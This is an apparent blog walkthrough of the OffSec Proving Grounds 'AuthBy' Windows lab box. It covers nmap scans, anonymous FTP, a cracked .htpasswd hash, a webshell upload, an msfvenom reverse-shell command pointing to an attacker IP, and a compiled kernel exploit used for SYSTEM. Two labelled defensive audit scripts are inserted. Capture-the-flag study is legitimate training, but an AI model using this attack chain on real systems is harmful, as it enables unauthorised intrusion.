AuthBy Walkthrough - Proving Grounds OffSec
AuthBy was actually a decently easy box even though it was labeled as "intermediate." I chose to do a Windows box this time to keep up my memory on Windows pen testing. So after booting up and grabbing the IP address of our target, I went ahead and started a port scan with nmap. I had to skip host discovery (the ICMP ping probes) during this scan with the -Pn flag.
nmap -p- -Pn 192.168.152.46 -o nmap.txt
PORT STATE SERVICE
21/tcp open ftp
242/tcp open direct
3145/tcp open csi-lfap
3389/tcp open ms-wbt-server
I then ran another nmap scan on just the ports that were open to find out what services were running on the open ports and version numbers.
nmap -sV -sC -Pn -p 21,242,3145,3389 192.168.152.46
PORT STATE SERVICE VERSION
21/tcp open ftp zFTPServer 6.0 build 2011-10-17
ftp-syst:
STAT:
System status
Connected to KALI
Logged in as IEUser@
TYPE: ASCII, FORM: Nonprint; STRUcture: File; transfer MODE: STREAM
No Data Connection
End of Status
ftp-anon: Anonymous FTP login allowed (FTP code 230)
total 9680
---------- 1 root root 5610496 Oct 18 2011 zFTPServer.exe
---------- 1 root root 25 Feb 10 2011 UninstallService.bat
---------- 1 root root 4284928 Oct 18 2011 Uninstall.exe
---------- 1 root root 17 Aug 13 2011 StopService.bat
---------- 1 root root 18 Aug 13 2011 StartService.bat
---------- 1 root root 8736 Nov 09 2011 Settings.ini
dr-xr-xr-x 1 root root 512 Sep 29 20:14 log
---------- 1 root root 2275 Aug 08 2011 LICENSE.htm
---------- 1 root root 23 Feb 10 2011 InstallService.bat
dr-xr-xr-x 1 root root 512 Nov 08 2011 extensions
dr-xr-xr-x 1 root root 512 Nov 08 2011 certificates
dr-xr-xr-x 1 root root 512 Jan 23 2023 accounts
242/tcp open http Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
http-auth:
HTTP/1.1 401 Authorization Required
Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
http-title: 401 Authorization Required
http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
3145/tcp open zftp-admin zFTPServer admin
3389/tcp open ssl/ms-wbt-server?
ssl-cert: Subject: commonName=LIVDA
Not valid before: 2023-01-22T09:37:27
Not valid after: 2023-07-24T09:37:27
ssl-date: 2023-09-29T13:17:31+00:00; -1s from scanner time.
rdp-ntlm-info:
Target_Name: LIVDA
NetBIOS_Domain_Name: LIVDA
NetBIOS_Computer_Name: LIVDA
DNS_Domain_Name: LIVDA
DNS_Computer_Name: LIVDA
Product_Version: 6.0.6001
System_Time: 2023-09-29T13:17:27+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft
I first looked at port 242 as it was running a webserver. I was immediately prompted to sign into the site. I tried normal credentials such as admin:admin but was unsuccessful.
I then backed up to the FTP server on port 21 that was able to be logged into anonymously according to our script scan from nmap.
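The two findings that drive the rest of this box (anonymous FTP and a Basic-auth prompt on plain HTTP, on top of an end-of-life Apache/PHP stack) are all sitting in that nmap output. The following script is an added example, not part of the original post or of nmap: it parses a trimmed copy of the scan in nmap's normal output format (constructed here, with the leading "|" script markers that the paste above lost) and turns those script results into audit findings a defender could act on. The list of end-of-life version markers is an assumption of the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed nmap -sV -sC report in nmap's normal output
# format. The pasted walkthrough output had the "|" NSE markers stripped.
SAMPLE_NMAP = """\
PORT     STATE SERVICE        VERSION
21/tcp   open  ftp            zFTPServer 6.0 build 2011-10-17
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ---------- 1 root root 8736 Nov 09 2011 Settings.ini
|_dr-xr-xr-x 1 root root 512 Jan 23 2023 accounts
242/tcp  open  http           Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
| http-auth:
| HTTP/1.1 401 Authorization Required
|_  Basic realm=Qui e nuce nuculeum esse volt, frangit nucem!
|_http-server-header: Apache/2.2.21 (Win32) PHP/5.3.8
3145/tcp open  zftp-admin     zFTPServer admin
3389/tcp open  ssl/ms-wbt-server?
"""

# "21/tcp   open  ftp   zFTPServer 6.0 ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "| ftp-anon: Anonymous FTP login allowed" -> script name and first line of output
SCRIPT_RE = re.compile(r"^\|_?\s*([a-z0-9-]+):\s*(.*)$")

# Assumed marker list: Apache 2.2 and PHP 5.x are both out of vendor support.
EOL_MARKERS = ("Apache httpd 2.2", "PHP/5.")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)  # script name -> full output


def parse_nmap(text):
    """Parse the port table and attached NSE script output into Port objects."""
    ports, current, script = [], None, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = Port(int(m.group(1)), m.group(2), m.group(3),
                           m.group(4), m.group(5).strip())
            ports.append(current)
            script = None
            continue
        if current is None or not line.startswith("|"):
            continue
        m = SCRIPT_RE.match(line)
        if m:  # a new script result begins
            script = m.group(1)
            current.scripts[script] = m.group(2)
        elif script:  # continuation line of the current script's output
            current.scripts[script] += "\n" + line.lstrip("|_ ").rstrip()
    return ports


def audit(ports):
    """Turn parsed scan data into (port, finding) pairs worth fixing."""
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        if "Anonymous FTP login allowed" in p.scripts.get("ftp-anon", ""):
            findings.append((p.number, "anonymous FTP login is enabled"))
        auth = p.scripts.get("http-auth", "")
        if "Basic realm" in auth and not p.service.startswith("ssl/"):
            findings.append((p.number, "HTTP Basic auth offered over cleartext HTTP"))
        if any(marker in p.version for marker in EOL_MARKERS):
            findings.append((p.number, f"end-of-life software: {p.version}"))
    return findings


if __name__ == "__main__":
    for port, msg in audit(parse_nmap(SAMPLE_NMAP)):
        print(f"{port}: {msg}")
```

On the sample above the audit reports the anonymous FTP login on 21 and both the cleartext Basic auth and the unsupported Apache/PHP build on 242; RDP on 3389 is skipped because the service is tagged ssl/.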
After looking through the directories, I looked at the "accounts" directory and found what appeared to be usernames: Offsec, anonymous, and admin.
I tried to log in with the usernames and basic default passwords, and the first one I tried let me in: admin
I saw that I was able to get the .htpasswd file for the web server we were just looking at that was prompting for a login. I grabbed the file and read it with cat on my local machine to reveal the hash for a user "offsec."
All I needed to do now was run the file through John or Hashcat and crack that password so that we can log in as offsec on the web server.
Almost instantly, John cracked the password using rockyou.txt. I grabbed that password and logged in as offsec in the web server.
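A password that falls to rockyou.txt "almost instantly" is usually a weak hash format as much as a weak password. The script below is an added example (not from the original post, and the walkthrough's real hash is not reproduced): it audits a constructed .htpasswd file, classifies each entry by the hash scheme Apache's htpasswd tool can emit, and, for the unsalted {SHA} scheme that the standard library can compute, shows how a handful of guesses is all it takes. The sample passwords and the four-word stand-in for rockyou.txt are made up for the demo.

```python
import base64
import hashlib
import re

# Constructed sample .htpasswd with one entry per scheme Apache accepts.
# The bcrypt and apr1 strings are placeholders of the right shape, not real hashes.
SAMPLE_HTPASSWD = """\
alice:$2y$05$examplebcryptsaltexamplebcryptsaltexamplebcrypthash00
bob:$apr1$abcdefgh$0123456789abcdefghijkl
carol:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
dave:{SHA}qUqP5cyxm6YcTAhz05Hph5gvu9M=
"""

# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "letmein", "123456", "offsec"]


def classify(hash_field):
    """Name the htpasswd hash scheme from its prefix/shape."""
    if re.match(r"^\$2[aby]\$", hash_field):
        return "bcrypt"            # slow, salted: the only one worth keeping
    if hash_field.startswith("$apr1$"):
        return "apr1-md5"          # salted but fast; cracks quickly on GPUs
    if hash_field.startswith("{SHA}"):
        return "sha1-unsalted"     # one SHA-1 per guess, no salt at all
    if re.fullmatch(r"[./0-9A-Za-z]{13}", hash_field):
        return "crypt-des"         # legacy crypt(3), 8-char password limit
    return "plaintext"             # anything else: treat as no protection


def sha1_entry(password):
    """Build the {SHA} field the way htpasswd -s does: base64(sha1(password))."""
    digest = hashlib.sha1(password.encode()).digest()
    return "{SHA}" + base64.b64encode(digest).decode()


def audit_htpasswd(text, wordlist=WORDLIST):
    """Return {user: {kind, acceptable, cracked}} for every entry in the file."""
    report = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, _, hash_field = line.partition(":")
        kind = classify(hash_field)
        cracked = None
        if kind == "sha1-unsalted":
            # Unsalted hashes need no per-user work: one hash per candidate word.
            cracked = next((w for w in wordlist if sha1_entry(w) == hash_field), None)
        elif kind == "plaintext":
            cracked = hash_field
        report[user] = {"kind": kind, "acceptable": kind == "bcrypt", "cracked": cracked}
    return report


if __name__ == "__main__":
    for user, info in audit_htpasswd(SAMPLE_HTPASSWD).items():
        print(f"{user:6} {info['kind']:14} ok={info['acceptable']} cracked={info['cracked']}")
```

Running it flags every non-bcrypt entry and recovers carol's password from the tiny wordlist, while dave's {SHA} hash survives only because his password is not in it. Regenerating entries with htpasswd -B (bcrypt) and keeping .htpasswd outside any directory an FTP account can read are the two fixes this box is really about.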
Since I knew where the directory was for this web page, and I had admin access to it, I knew that I could upload files to the directory. So I grabbed a webshell and uploaded it using the put command.
Now that the webshell was uploaded to the directory, all I had to do was access it via the web browser, and I would have RCE.
Now that I have RCE, I needed to get an interactive shell, so I created an msfvenom reverse executable shell and uploaded it to the same folder using the webshell, though I could have uploaded it via FTP as well.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.156 LPORT=4444 -f exe > shell.exe
Once I uploaded the shell, I set up a netcat listener on port 4444 and then executed the shell using the webshell command feature.
Finally, I had a fully interactive shell. The next step I tried was uploading winPEAS to the machine, but I was unable to execute it due to an architecture mismatch; I could have grabbed the other build of winPEAS, but I decided to enumerate a bit myself. I ran "whoami /priv" and saw that "SeImpersonatePrivilege" was enabled. I thought I might be able to use PrintSpoofer or one of the Potato family to try and escalate privileges, but I wanted to enumerate a bit further. I ran "systeminfo" and saw the OS version. I had seen this version before on another CTF, so I immediately Googled for exploits.
I opened this page and copied the code into a file called 40564.c. I needed to compile this C file into an executable .exe file using mingw32.
i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32
A small breakdown of this command: "i686-w64-mingw32-gcc" is the compiler I'm using to compile the code. It's a cross-compiler designed for compiling code on a non-Windows system (like Linux, which I'm using to do this) into Windows executables. It generates 32-bit Windows executables (i686 architecture). Then we have the .c file I just made; "-o exploit.exe" names the output file we want it compiled to; and "-lws2_32" is a linker option that specifies that the Windows Sockets 2 library should be linked with the program. This library provides functions for network programming on Windows, including socket operations, and it is required if your C program uses networking functionality. I generally always use it when building kernel exploits anyway.
I then used certutil to transfer the new executable over to the target machine and ran it to gain priv esc to nt authority\system.
All in all, a fairly simple machine, but a fun one. I think I might keep doing Windows machines for a while to sharpen my skills with those again. I was doing nothing but Windows boxes while studying for the OSCP, but now find myself surrounded by Linux machines. Hope you enjoyed it; please leave a like, share, or comment here if you enjoyed it or have any questions or comments to make.
-Sam